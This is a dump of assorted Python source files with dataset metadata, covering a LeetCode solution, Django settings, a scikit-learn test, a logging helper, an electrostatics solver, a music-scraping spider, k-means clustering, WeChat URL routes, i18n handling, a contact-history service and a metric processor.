reuter[\"people\"] = people\n reuter[\"orgs\"] = orgs\n reuter[\"companies\"] = companies\n reuter[\"data\"] = body\n newcollection.append(reuter)\n print('Data of the file '+file+' is saved to DB')\n collection.insert_many(newcollection)","sub_path":"5408-assignment-2-Assignment-3-BigData/NewsFileReader.py","file_name":"NewsFileReader.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"499487820","text":"class Solution:\n def findShortestSubArray(self, nums):\n dict1 = {i:0 for i in nums}\n dict2 = {i:[] for i in nums}\n l = len(nums)\n deg = 0\n for i in range(l):\n dict1[nums[i]] += 1\n deg = max(deg,dict1[nums[i]])\n dict2[nums[i]].append(i)\n\n m = l\n for key in dict1:\n if dict1[key] == deg:\n m = min(m,dict2[key][-1] - dict2[key][0] + 1)\n\n return m\n\n\n\n\n\n\n\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n\n","sub_path":"degree0fAnArray.py","file_name":"degree0fAnArray.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"437619001","text":"from .base import *\n\nenv = environ.Env()\n\nALLOWED_HOSTS = env.list('ALLOWED_HOSTS')\n\nSECRET_KEY = env.str('SECRET_KEY')\n\nDATABASES = {\n 'default': env.db()\n}\n\nREST_FRAMEWORK = {\n **REST_FRAMEWORK,\n 'DEFAULT_RENDERER_CLASSES': (\n 'djangorestframework_camel_case.render.CamelCaseJSONRenderer',\n )\n}\n","sub_path":"backend/config/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"454416349","text":"\"\"\"Test the covtype loader.\n\nSkipped if covtype is not already downloaded to data_home.\n\"\"\"\n\nimport errno\nfrom sklearn.datasets import fetch_covtype\nfrom sklearn.utils.testing import assert_equal, SkipTest\n\n\ndef fetch(*args, **kwargs):\n return fetch_covtype(*args, download_if_missing=False, **kwargs)\n\n\ndef test_fetch():\n try:\n data1 = fetch(shuffle=True, random_state=42)\n except IOError as e:\n if e.errno == errno.ENOENT:\n raise SkipTest(\"Covertype dataset can not be loaded.\")\n\n data2 = fetch(shuffle=True, random_state=37)\n\n X1, X2 = data1['data'], data2['data']\n assert_equal((581012, 54), X1.shape)\n assert_equal(X1.shape, X2.shape)\n\n assert_equal(X1.sum(), X2.sum())\n\n y1, y2 = data1['target'], data2['target']\n assert_equal((X1.shape[0],), y1.shape)\n assert_equal((X1.shape[0],), y2.shape)\n","sub_path":"Sklearn_scipy_numpy/source/sklearn/datasets/tests/test_covtype.py","file_name":"test_covtype.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"176299476","text":"import logging\nfrom logging.handlers import TimedRotatingFileHandler\n# https://www.cnblogs.com/du-jun/p/10556985.html\ndef getLooger(path='log'):\n debug = True\n # 日志输出格式\n # %(levelno)s: 打印日志级别的数值\n # %(levelname)s: 打印日志级别名称\n # %(pathname)s: 打印当前执行程序的路径,其实就是sys.argv[0]\n # %(filename)s: 打印当前执行程序名\n # %(funcName)s: 打印日志的当前函数\n # %(lineno)d: 打印日志的当前行号\n # %(asctime)s: 打印日志的时间\n # %(thread)d: 打印线程ID\n # %(threadName)s: 打印线程名称\n # %(process)d: 打印进程ID\n # %(message)s: 打印日志信息\n log_format = '%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s'\n if debug: # 如果是调试模式的话,就在屏幕上也打印��来\n logging.basicConfig(level=logging.DEBUG,\n format=log_format)\n\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n\n # (日志滚动,过期删除) 每天产生一个文件\n # 创建TimedRotatingFileHandler对象\n # interval: 滚动周期,单位有when指定,比如:when=’D’,interval=1,表示每天产生一个日志文件\n # when=M: 每分钟保存一个日志文件\n # backupCount: 表示日志文件的保留个数\n log_file_handler = TimedRotatingFileHandler(filename= path + \"/log\", when=\"D\", interval=1, backupCount=2)\n\n log_file_handler.setLevel(logging.DEBUG) # 输出到file的log等级的开关\n log_file_handler.setFormatter(logging.Formatter(log_format))\n logger.addHandler(log_file_handler)\n\n return logger\n","sub_path":"util/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"509513956","text":"import numpy as np\nimport time\nimport h5py\nimport matplotlib.pyplot as plt\n\n## Setting Boundary conditions for each split electrode with unique central hole sizes\n\ndelta = 100e-6 ## 100 micrometer precision\nlarge_sep = 50.4e-3\nsmall_sep = 12.4e-3\nlenX = 120e-3 # range we are looking at (120 mm)\nrange_x = np.arange(0, lenX, delta)\nsep = np.arange(small_sep, large_sep, delta*10)\nrange_z_largest = np.arange(-sep[-1]/2, sep[-1]/2, delta)\nU = np.empty((len(range_z_largest), len(range_x), len(sep)))\n\n\nstart = time.time()\n\n\nfor k in np.arange(0,len(sep)):\n\n lenZ = sep[k] ## the distance between your plates\n\n range_z = np.arange(-lenZ/2, lenZ/2, delta)\n\n hole_radii = 1.5e-3\n\n fopt = 2 - (2*np.pi)/float(len(range_z))\n\n #BCs\n #Ttop = 50 ## insert gaussian beam profile for IFO beam heating (right now it is just a delta function BC)\n V_o = 25.0 ## Voltage applied to plates\n Utop = V_o\n Ubottom = -1.0*V_o\n Uleft = 0\n Uright = 0\n\n # Initial guess of what the temperature of inside will be\n Uguess = 0\n\n #Set meshgrid\n X, Z = np.meshgrid(range_x, range_z)\n\n ## Hole size is a fraction of the range you are looking at.. what is that fraction and what is that relative to the plate size?\n U_temp = np.empty((len(range_z), len(range_x)))\n U_before = np.empty((len(range_z), len(range_x)))\n U_temp.fill(Uguess)\n\n #Set BC\n ## Plates are finite, establish size\n rad_plate = 50.8e-3\n\n near_side = int(round((1.0/2.0*len(range_x)- rad_plate/delta)))\n far_side = int(round((1.0/2.0*len(range_x)+ rad_plate/delta)))\n\n U_temp[(len(range_z)-1):,near_side:far_side] = Utop\n U_temp[:1, near_side:far_side] = Ubottom\n U_temp[:, (len(range_x)-1):] = Uright\n U_temp[:, :1] = Uleft\n\n ##Making holes in plates\n first_half = int(round((1.0/2.0*len(range_x)- hole_radii/delta)))\n second_half = int(round((1.0/2.0*len(range_x)+ hole_radii/delta)))\n\n U_temp[(len(range_z)-1):,first_half:second_half] = 0\n U_temp[:1, first_half:second_half] = 0\n\n # Iteration\n print(\"Please wait for a moment\")\n conv = 3\n count = 0\n while conv > 2:\n conv = np.sum(np.abs(U_temp[:,:]-U_before[:,:]))\n print(conv)\n U_before[:,:] = U_temp[:,:]\n for j in range(1, len(range_x)-1):\n for i in range(1, len(range_z)-1):\n U_temp[i, j] = (1-fopt) * U_temp[i, j] + fopt*.25*(U_temp[i+1][j] + U_temp[i-1][j] + U_temp[i][j+1]+ U_temp[i][j-1])\n\n for j in range(1, len(range_x)-1)[::-1]:\n for i in range(1, len(range_z)-1)[::-1]:\n U_temp[i, j] = (1-fopt) * U_temp[i, j] + fopt*.25*(U_temp[i+1][j] + U_temp[i-1][j] + U_temp[i][j+1] + U_temp[i][j-1])\n #T[i,j] = .25*(T[i+1][j] + T[i-1][j] + T[i][j+1]+ T[i][j-1])\n count += 1\n\n #Storing potential array in larger array\n U[(len(range_z_largest)-len(range_z))/2:(len(range_z_largest)+len(range_z))/2,:,k] = U_temp[:,:]\n\nelapsed = time.time() - start\n\n\n\nprint(\"Iteration finished after {} iterations and took {} seconds\".format(count, elapsed))\n\n\n\n\nfile = h5py.File('data/split_electrode/numerical_split_electrode_test_vary_sep_test.h5'.format(count), 'w')\nfile.create_dataset('X', data=X)\nfile.create_dataset('Z', data=Z)\nfile.create_dataset('V_o', data=V_o)\nfile.create_dataset('lenX', data= lenX)\nfile.create_dataset('lenZ', data=lenZ)\nfile.create_dataset('potential', data=U)\nfile.create_dataset('delta', data=delta)\nfile.create_dataset('disk_radii',data=rad_plate )\nfile.create_dataset('hole_radii', data=hole_radii)\nfile.create_dataset('time_elapsed', data=elapsed)\nfile.create_dataset('disk_separation',data=sep)\nfile.close()\n","sub_path":"code/fea_electrodes/python_scripts/fea_split_electrode_plate_sep.py","file_name":"fea_split_electrode_plate_sep.py","file_ext":"py","file_size_in_byte":3652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"50309234","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport time\nimport json\nfrom myweibo.spiders.kugoufz import hhgg\nfrom myweibo.items import MyweiboItem\n\nclass KugouSpider(scrapy.Spider):\n name = 'kugou'\n allowed_domains = ['www.kugou.com']\n start_urls = ['https://wwwapi.kugou.com']\n\n def parse(self, response):\n print('1、单首歌,2、歌手或歌曲类型')\n num = input('请选择搜索类型:')\n ttt = True\n while ttt:\n if num == '1' or num == '2':\n ttt = False\n else:\n print('1、单首歌,2、歌手或歌曲类型')\n print()\n num = input('输入的不符合规则,请选择搜索类型:')\n print(num)\n if num == '1':\n title = input('请输入歌曲名称:')\n else:\n title = input('请输入歌手或歌曲类型:')\n print(title)\n mn = hhgg().hg(num,title)\n print(mn)\n for j in mn:\n item = MyweiboItem()\n item['title'] = '/mp3/'+j[1]+'-'+j[0]+'.mp3'\n item['url'] = [j[2]]\n yield item\n\n\n\nfrom scrapy.crawler import CrawlerProcess #导入CrawlerProcess类\nfrom scrapy.utils.project import get_project_settings #导入获取项目设置信息\n\nif __name__ == '__main__': #程序入口\n process = CrawlerProcess(get_project_settings()) #创建CrawlerProcess类对象并传入项目设置信息参数\n process.crawl('kugou') #需要启动爬虫名称\n process.start() #启动爬虫\n","sub_path":"bao/kugou.py","file_name":"kugou.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"28070797","text":"\"\"\"\n - sample size as a ratio of our full dataset\n - random state for reproducibility\n - number of clusters (k) for our dataset\n - number of iterations (n) for our k-means algorithm\n - number of attempts at finding our best chance initial centroids while clustering on our sample dataset\n\n\"\"\"\n\nfrom sklearn.cluster import KMeans\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nimport numpy as np\nimport pandas as pd\n\n# target은 x_train의 예측 label / labels는 x_train의 실제 label\ndef matrics_function(target, labels):\n species = np.chararray(target.shape, itemsize=150)\n for i in range(len(target)):\n if target[i] == 0:\n species[i] = 'setosa'\n elif target[i] == 1:\n species[i] = 'versicolor'\n elif target[i] == 2:\n species[i] = 'virginica'\n\n df = pd.DataFrame({'labels': labels, 'species': species})\n ct = pd.crosstab(df['labels'], df['species'])\n\n return ct\n\nclass color:\n PURPLE = '\\033[95m'\n CYAN = '\\033[96m'\n DARKCYAN = '\\033[36m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n RED = '\\033[91m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n END = '\\033[0m'\n\n# Some variables\nRANDOM_STATE = 42\nNUM_CLUSTERS = 2\nNUM_ITER = 100\n\nprint(color.BOLD+\"\\n데이터 호출\"+color.END)\ndata = pd.read_csv(\"dataset/Unknown_data.csv\")\n#data = data.sample(frac=0.1, random_state=43)\ny = data['Label']\nX = data.drop(['Label'], axis=1).to_numpy()\n#std_scaler = StandardScaler()\n#fitted = std_scaler.fit(X)\n#X = std_scaler.transform(X)\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n\n\n#k-means 학습 수행\ncents_list = []\ninert_list = []\n\nkm = KMeans(n_clusters=NUM_CLUSTERS, init='random', max_iter=1, n_init=1)\nkm.fit(X_train)\ninertia = km.inertia_\ncents = km.cluster_centers_\ncents_list.append(cents)\ninert_list.append(inertia)\n\nprint(color.BOLD+\"\\nInitial centroid 찾기\"+color.END)\nfor iter in range(NUM_ITER):\n km = KMeans(n_clusters=NUM_CLUSTERS, init=cents, max_iter=1, n_init=1)\n km.fit(X_train)\n #print('Iteration: ', iter)\n #print('Inertia:', km.inertia_)\n cc = km.cluster_centers_.tolist()\n print('Centroids:', cc)\n inertia = km.inertia_\n cents = km.cluster_centers_\n\n cents_list.append(cents)\n inert_list.append(inertia)\n\n# Get best centroids to use for full clustering\nbest_cents = cents_list[inert_list.index(min(inert_list))]\nprint(\"\\nbest centroids to use for full clustering\")\nprint(best_cents.tolist())","sub_path":"201111_based_ml/best_centroid.py","file_name":"best_centroid.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"106189227","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.conf.urls import url\nfrom wechat import views\n\nurlpatterns = [\n # 处理发给公众号的消息和事件\n url(\n r'^server/(?P[0-9a-z_]+)/?$',\n views.ProcessServerEventView.as_view(),\n name='wechat-server_messages'\n ),\n # 获取授权链接\n url(\n r'^auth/?$',\n views.WechatAuthPageView.as_view(),\n name='wechat-auth'\n ),\n # 公众号授权成功后由微信服务器调用\n url(\n r'^authorized/?$',\n views.WechatAuthSuccessPageView.as_view(),\n name='wechat-authorized'\n ),\n # 授权事件接收URL\n url(\n r'^callback/?$',\n views.AuthEventProcessView.as_view(),\n name='wechat-component-verify-ticket'\n )\n]\n","sub_path":"demo/wechat/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"183209211","text":"from . import strings_en\nfrom . import strings_zh_hans\nfrom . import strings_zh_hant\n\nfrom .. import db\n\n_strings_all = {\n 'en': strings_en,\n 'zh-hans': strings_zh_hans,\n 'zh-hant': strings_zh_hant\n}\n\nlanguages = {'en': 'English', 'zh-hans': '简体中文', 'zh-hant': '繁體中文'}\n\n\ndef I18nHandler(database: db.Database):\n def withi18n(func):\n async def wrapper(event):\n if not event.is_private:\n return await func(event=event, strings=strings_en)\n\n user = await event.get_chat()\n strings_telegram = _strings_all[user.lang_code] \\\n if user.lang_code in _strings_all else strings_en\n\n # When a user /start the bot for the 1st time\n if database.get_user_state(user) is None:\n return await func(event=event, strings=strings_telegram)\n\n db_lang = database.get_user_lang(user.id)\n if db_lang in ['follow', None]:\n return await func(event=event, strings=strings_telegram)\n return await func(event=event, strings=_strings_all[db_lang])\n\n return wrapper\n\n return withi18n\n","sub_path":"tgficbot/i18n/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"4287695","text":"#!/usr/bin/env python\n#***************************************************************************/\n#*\n#* Copyright (c) 2007 Vonage Holdings Corp.\n#* All rights reserved.\n#*\n#*\n#***************************************************************************/\n#\n\n\"\"\"\nContact History\n===============\n\tThe Contact History service lets you view changes to a given contact over time.\n\n\tOverview\n\t--------\n\t - B{Version}\n\t\t- 1.0.0\n\t - B{SVN Revision}\n\t\t- $Revision: 373313 $\n\t - B{Method}\n\t\t- HTTP GET\n\t - B{Required get parameters}\n\t\t- contact_id\n\t - B{Optional get parameters}\n\t\t- contact_owner_id\n\t - B{Returns}\n\t\t- HTTP 200 - On success, with XML response body.\n\t\t- HTTP 403 - When insufficient parameters are passed in to the service\n\t\t- HTTP 500 - Server error, exception information and stack trace in XML response body\n\t - B{Routes}\n\t\t- /history/summary/contact/:contact_id\n\n\tExamples\n\t--------\n\n\tHistory\n\t-------\n\t - Created: Raymond Cohen 06/09/2008\n\"\"\"\n\n\nfrom vonage.dispatcher.handler import Handler\nfrom vonage.util.vonxmlserializer import XMLSerializer\nfrom contact_manager.xml_models import *\nfrom vonage.util.rest_utils import RestClientError, RestDatabaseNotFound, RestDatabaseError\nfrom vonage.util.data_utils import strip_param_dict\n\nimport xml.dom.minidom\nfrom xml import xpath\n\nDEFAULT_SERVICE_ENVELOPE_VERSION = 1.0\nSERVICE_ATTRIBUTES = {'name': 'contact_history',\n\t'version': str(DEFAULT_SERVICE_ENVELOPE_VERSION),\n\t'revision': '$Revision: 373313 $'}\n\nDELETE = \"DELETE\"\n#position of each id in the enormous SQL select\nCONTACT_ID = 1\nADDRESS_ID = 10\nEMAIL_ID = 20\nIM_ID = 26\nNOTE_ID = 32\nOTHER_ID = 37\nPHONE_ID = 42\nURI_ID = 49\n\ndef has_id(arr, an_id):\n\tfor el in arr:\n\t\tif el.__id__ == an_id:\n\t\t\treturn True\n\treturn False\n\ndef has_replaced_on(arr, a_date):\n\tfor el in arr:\n\t\tif el.__replaced_on__ == a_date:\n\t\t\treturn True\n\treturn False\n\nclass ReturnObject(XMLSerializer):\n\tdef __init__(self):\n\t\tself.revisions = []\n\nclass ContactHandler(Handler):\n\t\"\"\"Encapsulates service request handling logic\"\"\"\n\tdef __init__(self):\n\t\tHandler.__init__(self, DEFAULT_SERVICE_ENVELOPE_VERSION)\n\t\tself.required_get_args_choose_one = ['contact_id']\n\t\tself.optional_get_args = ['contact_owner_id']\n\n\tdef get(self, http, req_dict):\n\t\tc_id = req_dict['contact_id']\n\t\tco_id = req_dict['contact_owner_id']\n\n\t\tresult = self.get_contact_history(c_id, co_id)\n\t\tif not result:\n\t\t\traise RestDatabaseNotFound(\"No matching contacts found\")\n\n\t\tret_obj = ReturnObject()\n\t\tret_obj.contact = result\n\t\treturn ret_obj.dumps(SERVICE_ATTRIBUTES)\n\n\tdef get_contact_history(self, contact_id, contact_owner_id):\n\t\tparams = {'contact_owner_id': contact_owner_id, 'contact_id': contact_id}\n\n\t\tsql = \"\"\"\n\t\tSELECT to_char(c.audit_date, 'YYYY-MM-DD HH24:MI:SS.MS'),\n\n\t\t\tc.id, c.first_name, c.middle_name, c.last_name, c.nick_name, c.title, c.suffix,\n\t\t\tc.audit_operation, to_char(c.modify_date, 'YYYY-MM-DD HH24:MI:SS.MS'),\n\n\t\t\tca.id, ca.address_type, ca.description, ca.address, ca.city, ca.state, ca.country, ca.postcode,\n\t\t\tca.audit_operation, to_char(ca.modify_date, 'YYYY-MM-DD HH24:MI:SS.MS'),\n\n\t\t\tce.id, ce.email_type, ce.description, ce.email_address,\n\t\t\tce.audit_operation, to_char(ce.modify_date, 'YYYY-MM-DD HH24:MI:SS.MS'),\n\n\t\t\tcim.id, cim.description, cim.im_service, cim.im_username,\n\t\t\tcim.audit_operation, to_char(cim.modify_date, 'YYYY-MM-DD HH24:MI:SS.MS'),\n\n\t\t\tcn.id, cn.description, cn.note,\n\t\t\tcn.audit_operation, to_char(cn.modify_date, 'YYYY-MM-DD HH24:MI:SS.MS'),\n\n\t\t\tco.id, co.description, co.data,\n\t\t\tco.audit_operation, to_char(co.modify_date, 'YYYY-MM-DD HH24:MI:SS.MS'),\n\n\t\t\tctn.id, ctn.telephone_type, ctn.description, ctn.display_number, ctn.phone_number,\n\t\t\tctn.audit_operation, to_char(ctn.modify_date, 'YYYY-MM-DD HH24:MI:SS.MS'),\n\n\t\t\tcu.id, cu.uri_type, cu.description, cu.uri\n\t\t\tcu.audit_operation, to_char(cu.modify_date, 'YYYY-MM-DD HH24:MI:SS.MS')\n\n\t\tFROM contacts_audit c\n\t\t\tLEFT OUTER JOIN contact_addresses_audit ca ON (c.id = ca.contact_id AND c.audit_date = ca.audit_date)\n\t\t\tLEFT OUTER JOIN contact_emails_audit ce ON (c.id = ce.contact_id AND c.audit_date = ce.audit_date)\n\t\t\tLEFT OUTER JOIN contact_instant_messengers_audit cim ON (c.id = cim.contact_id AND c.audit_date = cim.audit_date)\n\t\t\tLEFT OUTER JOIN contact_notes_audit cn ON (c.id = cn.contact_id AND c.audit_date = cn.audit_date)\n\t\t\tLEFT OUTER JOIN contact_others_audit co ON (c.id = co.contact_id AND c.audit_date = co.audit_date)\n\t\t\tLEFT OUTER JOIN contact_telephone_numbers_audit ctn ON (c.id = ctn.contact_id AND c.audit_date = ctn.audit_date)\n\t\t\tLEFT OUTER JOIN contact_uris_audit cu ON (c.id = cu.contact_id AND c.audit_date = cu.audit_date)\n\t\tWHERE\n\t\t\"\"\"\n\n\t\tothers = False\n\t\tif contact_id:\n\t\t\tsql += \"c.id = %(contact_id)s\"\n\t\t\tothers = True\n\n\t\tif contact_owner_id:\n\t\t\tif others:\n\t\t\t\tsql += \" and \"\n\t\t\tsql += \"c.contact_owner_id = %(contact_owner_id)s\"\n\n\t\tsql += \" ORDER BY c.audit_date\"\n\n\t\tconn = self.get_connection('contactmanager')\n\t\tcurs = conn.cursor()\n\t\tcurs = self.execute_query(curs, sql, strip_param_dict(params))\n\t\trows = curs.fetchall()\n\n\t\thistories = []\n\t\tfor row in rows:\n\t\t\tself.process_row(row, histories)\n\n\t\treturn histories\n\n\tdef process_row(self, row, contacts):\n\t\t\"\"\"adds new information in row to histories hash\"\"\"\n\n\t\tself.process_contact_basics(row, contacts) # this one must be first\n\n\t\tc = contacts[row[0]]\n\t\tc.__audit_date__ = row[0] + \" +0000\"\n\t\tself.process_contact_addresses(row, c)\n\t\tself.process_contact_emails(row, c)\n\t\tself.process_contact_instant_messengers(row, c)\n\t\tself.process_contact_notes(row, c)\n\t\tself.process_contact_others(row, c)\n\t\tself.process_contact_telephone_numbers(row, c)\n\t\tself.process_contact_uris(row, c)\n\n\tdef process_contact_basics(self, row, contact):\n\t\tif row[0] and not contacts.has_key(row[0]): # this is using the TRANSACTION_DATE\n\t\t\tcontacts[row[0]] = self.contact_basics_from_row(row, CONTACT_ID)\n\n\tdef process_contact_addresses(self, row, contact):\n\t\tif row[ADDRESS_ID] and not has_id(contact.contact_address, row[ADDRESS_ID]):\n\t\t\tca = self.contact_address_from_row(row, ADDRESS_ID)\n\t\t\tcontact.contact_address.append(ca)\n\n\tdef process_contact_emails(self, row, contact):\n\t\tif row[EMAIL_ID] and not has_id(contact.contact_email, row[EMAIL_ID]):\n\t\t\tce = self.contact_email_from_row(row, EMAIL_ID)\n\t\t\tcontact.contact_email.append(ce)\n\n\tdef process_contact_instant_messengers(self, row, contact):\n\t\tif row[IM_ID] and not has_id(contact.contact_instant_messenger, row[IM_ID]):\n\t\t\tcim = self.contact_instant_messenger_from_row(row, IM_ID)\n\t\t\tcontact.contact_instant_messenger.append(cim)\n\n\tdef process_contact_notes(self, row, contact):\n\t\tif row[NOTE_ID] and not has_id(contact.contact_note, row[NOTE_ID]):\n\t\t\tcn = self.contact_note_from_row(row, NOTE_ID)\n\t\t\tcontact.contact_note.append(cn)\n\n\tdef process_contact_others(self, row, contact):\n\t\tif row[OTHER_ID] and not has_id(contact.contact_other, row[OTHER_ID]):\n\t\t\tco = self.contact_other_from_row(row, OTHER_ID)\n\t\t\tcontact.contact_other.append(co)\n\n\tdef process_contact_telephone_numbers(self, contact): # also handle speed_dials\n\t\tif row[PHONE_ID] and not has_id(contact.contact_telephone_number, row[PHONE_ID]):\n\t\t\tctn = self.contact_telephone_number_from_row(row, PHONE_ID)\n\t\t\tcontact.contact_telephone_number.append(ctn)\n\n\tdef process_contact_uris(self, row, contact):\n\t\tif row[URI_ID] and not has_id(contact.contact_uri, row[URI_ID]):\n\t\t\tcu = self.contact_uri_from_row(row, URI_ID)\n\t\t\tcontact.contact_uri.append(cu)\n\n\tdef contact_basics_from_row(self, row, offest = 0):\n\t\tc = Contact()\n\t\tc.__id__ = row[offset]\n\t\tc.first_name = row[offset + 1]\n\t\tc.middle_name = row[offset + 2]\n\t\tc.last_name = row[offset + 3]\n\t\tc.nick_name = row[offset + 4]\n\t\tc.title = row[offset + 5]\n\t\tc.suffix = row[offset + 6]\n\n\t\tif row[offset + 7] and DELETE == row[offset + 7]:\n\t\t\tc.__deleted__ = \"true\"\n\t\tc.modify_date = row[offset + 8] + \" +0000\"\n\n\t\treturn c\n\n\tdef contact_uri_from_row(self, row, offset = 0):\n\t\tcu = ContactUri()\n\t\tcu.__id__ = row[offset]\n\t\tcu.uri_type = row[offset + 1]\n\t\tcu.description = row[offset + 2]\n\t\tcu.uri = row[offset + 3]\n\n\t\tif row[offset + 4] and DELETE == row[offset + 4]:\n\t\t\tcu.__deleted__ = \"true\"\n\t\tcu.modify_date = row[offset + 5] + \" +0000\"\n\n\t\treturn cu\n\n\tdef contact_other_from_row(self, row, offset = 0):\n\t\tco = ContactOther()\n\t\tco.__id__ = row[offset]\n\t\tco.description = row[offset + 1]\n\t\tco.data = row[offset + 2]\n\n\t\tif row[offset + 3] and DELETE == row[offset + 3]:\n\t\t\tco.__deleted__ = \"true\"\n\t\tco.modify_date = row[offset + 4] + \" +0000\"\n\n\t\treturn co\n\n\tdef contact_note_from_row(self, row, offset = 0):\n\t\tcn = ContactNote()\n\t\tcn.__id__ = row[offset]\n\t\tcn.description = row[offset + 1]\n\t\tcn.note = row[offset + 2]\n\n\t\tif row[offset + 3] and DELETE == row[offset + 3]:\n\t\t\tcn.__deleted__ = \"true\"\n\t\tcn.modify_date = row[offset + 4] + \" +0000\"\n\n\t\treturn cn\n\n\tdef contact_telephone_number_from_row(self, row, offset = 0):\n\t\tctn = ContactTelephoneNumber()\n\t\tctn.__id__ = row[offset]\n\t\tctn.telephone_type = row[offset + 1]\n\t\tctn.description = row[offset + 2]\n\t\tctn.display_number = row[offset + 3]\n\t\tctn.phone_number = row[offset + 4]\n\n\t\tif row[offset + 5] and DELETE == row[offset + 5]:\n\t\t\tctn.__deleted__ = \"true\"\n\t\tctn.modify_date = row[offset + 6] + \" +0000\"\n\n\t\treturn ctn\n\n\tdef contact_email_from_row(self, row, offset = 0):\n\t\tce = ContactEmail()\n\t\tce.__id__ = row[offset]\n\t\tce.email_type = row[offset + 1]\n\t\tce.description = row[offset + 2]\n\t\tce.email_address = row[offset + 3]\n\n\t\tif row[offset + 4] and DELETE == row[offset + 4]:\n\t\t\tce.__deleted__ = \"true\"\n\t\tce.modify_date = row[offset + 5] + \" +0000\"\n\n\t\treturn ce\n\n\tdef contact_address_from_row(self, row, offset = 0):\n\t\tca = ContactAddress()\n\t\tca.__id__ = row[offset]\n\t\tca.address_type = row[offset + 1]\n\t\tca.description = row[offset + 2]\n\t\tca.address = row[offset + 3]\n\t\tca.city = row[offset + 4]\n\t\tca.state = row[offset + 5]\n\t\tca.country = row[offset + 6]\n\t\tca.postcode = row[offset + 7]\n\n\t\tif row[offset + 8] and DELETE == row[offset + 8]:\n\t\t\tca.__deleted__ = \"true\"\n\t\tca.modify_date = row[offset + 9] + \" +0000\"\n\n\t\treturn ca\n\n\tdef contact_instant_messenger_from_row(self, row, offset = 0):\n\t\tcim = ContactInstantMessenger()\n\t\tcim.__id__ = row[offset]\n\t\tcim.description = row[offset + 1]\n\t\tcim.im_service = row[offset + 2]\n\t\tcim.im_username = row[offset + 3]\n\n\t\tif row[offset + 4] and DELETE == row[offset + 4]:\n\t\t\tcim.__deleted__ = \"true\"\n\t\tcim.modify_date = row[offset + 5] + \" +0000\"\n\n\t\treturn cim\n\n\tdef routes(self, routemap, key):\n\t\tself.connect_route(routemap, \"/history/summary/contact/:contact_id\", key)\n\n","sub_path":"contact_manager/contact_history.py","file_name":"contact_history.py","file_ext":"py","file_size_in_byte":10606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"155407551","text":"# Python 2 / 3 compatibility\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport collections\nimport logging\n\nfrom . import config\n\n\nMetric = collections.namedtuple(\n \"Metric\",\n (\"reference\", \"timestamp\", \"interval_seconds\", \"value\", \"rate\", \"delta\",\n \"type\")\n)\n\n\n# Absolute -> time, interval, raw, rate=raw/interval\n# Gauge -> time, interval, raw, rate=raw\n# Counter -> time, interval, raw, delta=raw-old[rollover], rate=delta/interval\n# Derive -> time, interval, raw, delta=raw-old, rate=delta/interval\n\n\nclass MetricProcessor(object):\n\n __slots__ = (\"config_item\", \"last_timestamp\", \"last_raw_value\")\n\n TYPE = None\n\n def __init__(self, config_item):\n self.config_item = config_item\n self.last_timestamp = None\n self.last_raw_value = None\n\n def __call__(self, raw_file_line):\n assert self.reference == raw_file_line.reference\n if self.reference != raw_file_line.reference:\n return None\n\n new_value = None\n if raw_file_line.value != config.VAL_UNKNOWN:\n new_value = self.parse_value(raw_file_line.value)\n\n interval_seconds = None\n new_timestamp = raw_file_line.timestamp\n if self.last_timestamp is not None:\n interval_seconds = new_timestamp - self.last_timestamp\n\n rate, delta = \\\n self.process(interval_seconds, self.last_raw_value, new_value)\n rate = self.apply_limits(rate)\n\n self.last_timestamp = new_timestamp\n self.last_raw_value = new_value\n\n return Metric(\n raw_file_line.reference, new_timestamp, interval_seconds, new_value,\n rate, delta, self.TYPE\n )\n\n @classmethod\n def parse_value(cls, value):\n if value == '':\n return None\n try:\n return int(value)\n except ValueError:\n try:\n return float(value)\n except ValueError:\n logger = logging.getLogger()\n logger.warning(\"Invalid raw value : %s\", value)\n\n def process(self, interval_seconds, last_raw_value, new_value):\n raise NotImplementedError()\n\n @property\n def reference(self):\n return self.config_item.reference\n\n @property\n def min(self):\n return self.config_item.min\n\n @property\n def max(self):\n return self.config_item.max\n\n # See rrdtool/src/rrd_update.c update_pdp_prep\n def apply_limits(self, rate):\n if rate is not None:\n if self.max != config.VAL_UNKNOWN and rate > self.max:\n rate = None\n elif self.min != config.VAL_UNKNOWN and rate < self.min:\n rate = None\n return rate\n\n\nclass FloatMetricProcessor(MetricProcessor):\n\n def process(self, interval_seconds, last_raw_value, new_value):\n raise NotImplementedError()\n\n\n# See rrdtool/src/rrd_update.c 